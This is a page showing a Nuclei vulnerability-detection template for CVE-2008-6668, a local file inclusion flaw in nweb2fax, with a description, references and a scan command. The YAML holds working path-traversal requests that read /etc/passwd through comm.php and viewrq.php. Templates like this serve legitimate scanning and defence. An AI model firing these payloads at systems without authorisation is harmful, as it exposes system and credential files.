nweb2fax <=0.2.7 - Local File Inclusion
ID: CVE-2008-6668
Severity: medium
Author: geeknik
Tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley
Description
Section titled “Description”nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
YAML Source
Section titled “YAML Source”id: CVE-2008-6668
info: name: nweb2fax <=0.2.7 - Local File Inclusion author: geeknik severity: medium description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/5856 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43172 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 epss-percentile: 0.72128 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: dirk_bartley product: nweb2fax tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley
http: - method: GET path: - "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd" - "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a00463044022002401e6d2cfcf6e927c6ab012b66855586ad7b69aa6bea72e4d18763fa607c6802205b62802a0fc065d6ffc20195b84ac858105f9013c98d6cd41fe3f7eb82731247:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2008/CVE-2008-6668.yaml"